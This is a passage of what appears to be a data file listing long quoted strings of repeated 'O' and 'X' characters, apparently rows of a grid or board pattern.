OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX